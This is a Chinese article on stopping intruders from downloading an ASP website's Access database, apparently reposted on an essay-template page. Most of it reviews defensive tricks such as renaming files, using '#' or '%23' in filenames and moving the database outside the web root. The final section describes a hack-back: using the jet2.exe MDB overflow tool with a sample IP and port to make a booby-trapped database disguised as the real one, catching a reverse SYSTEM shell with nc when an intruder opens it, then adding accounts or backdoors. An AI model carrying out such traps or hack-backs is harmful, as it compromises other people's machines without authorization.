网站原创很多动态站点大量地应用了数据库,数据库理所当然成为一个站点的核心文件.一旦数据库被人下载,极有可能被恶意人士用来破坏网站,或者窃取资料.实在痛心啊!有什么方法可以防止数据库被入侵者下载呢?
网上讲解了好多关于防止数据库被下载的办法,我在这里为大家先简单小结一下,也算是个回顾.方法一:修改原始数据库的文件名并在conn.asp中做相应修改;方法二:修改数据库后缀为ASP;方法三:在数据库文件名中加入“#”字符;方法四:加密数据库(不过效果几乎为0);方法五:将数据库文件放在其他目录而不放在网站目录;方法六:我自创的方法,稍后将会介绍.
上面五种方法也是一般管理员经常用到的方法,在这里我大体解释一下:
方法一中一般我们喜欢用别人的整站程序,由于许多整站程序都是公开的,这样一来数据库的路径也是公开的,如果不修改的话攻击者可以通过IE或flashget下载网站数据库;
方法二中将数据库后缀改为ASP能防止攻击者用IE下载数据库,但却不能防止用flashget下载,只要在flashget中填入下载地址便可将其下载,原因是因为IE只会将其做为asp文件进行解析,而不会认为其是数据库文件让你下载;
方法三中加入“#”字符原理是因为通过IE下载文件时只能识别 “#”号前名的部分,对于“#”后面的会自动去掉,比如数据库名为jsj#h.mdb,当你在IE中输入.省略/jsj#h.mdb的时候,IE却会在网站目录中寻找jsj(当然也不是jsj.mdb),由于网站目录并中没有jsj这个文件,所以导致下载终止.但是当我们将.省略/jsj#h.mdb这个地址改为.省略/jsj%23h.mdb的时候却可以通过IE正常下载了,有人又问如果地址是.省略/jsj#h.asp呢?很简单,直接通过flashget就可以下载了.
方法五在此我演示一下,原来的conn.asp文件如图1,数据库的文件名为myleaf.asp,站点目录名为jsj,我们在与站点同一级目录下建立一个名为data的文件夹,将原来的myleaf.asp数据库文件移动到data目录下,再将conn.asp改为图2所示即可,这样一来就算暴露了conn.asp文件,攻击者也不能将数据库下载下来,因为数据库文件不在站点文件夹中.
| 有关论文范文主题研究: | 关于方法的论文范文资料 | 大学生适用: | 学术论文、学术论文 |
|---|---|---|---|
| 相关参考文献下载数量: | 43 | 写作解决问题: | 本科论文怎么写 |
| 毕业论文开题报告: | 论文提纲、论文设计 | 职称论文适用: | 杂志投稿、高级职称 |
| 所属大学生专业类别: | 本科论文怎么写 | 论文题目推荐度: | 经典题目 |
下面我介绍下自己的方法.说出来其实也很简单.步骤如下:
1.将原来数据库myleaf.asp的名字改为my%23leaf.asp;
2.在conn.asp中做相应修改.只需两步即可.这样一来不管攻击者是通过IE还是flashget够无法下载数据库.
为了验证我们做个实验,我在本地已经搭建了web怎么写作器,在IE地址栏中输入127.0.0.1/my%23leaf.asp,如图3,显示网页错误,同样我们用flashget下载地址为127.0.0.1/my%23leaf.asp时也出现了错误,如图4,5.很明显实验成功!
在这里我们还可以愚弄下入侵者,如何愚弄呢?我们在网站目录下建立一个名为my#leaf.asp文件,里面随便写些文字,当对方用flashget试图下载my%23leaf.asp数据库时下载的却是my#leaf.asp这个文件.同样当入侵者在IE中输入127.0.0.1/my%23leaf.asp时,显示的也只是my#leaf.asp中的内容,如图6.(因为flashget和IE都将%23解析为#了)
为了给入侵者一个教训让他以后能够收敛些,我们可以反向入侵他们,如何做到这一点呢?用到的工具是jet2.exeMDB溢出工具,JET2的使用格式为:jet2 1 你的IP端口,很明显是反弹溢出.我们在命令行下输入jet2 218.27.161.49 1314 如图7,这样在桌面上便会生成一个名为db1.mdb的数据库文件,我们将此文件名改为my#leaf.asp放入网站目录,同时我们在本地用nc监听,如图8.
当攻击者试图下载真正的数据库文件my%23leaf.asp时下的是my#leaf.asp文件,当他们下载完毕将my#leaf.asp改为my#leaf.mdb并试图用辅臣数据库浏览器打开这个mdb文件时候才出现了图9的界面,我们成功得到了攻击的systemshell.
得到systemshell后还有我们所不能做的吗?加帐号也好,留后门也好,都随便你了,尽情发挥!
本文为全文原貌 未安装PDF浏览器用户请先下载安装 原版全文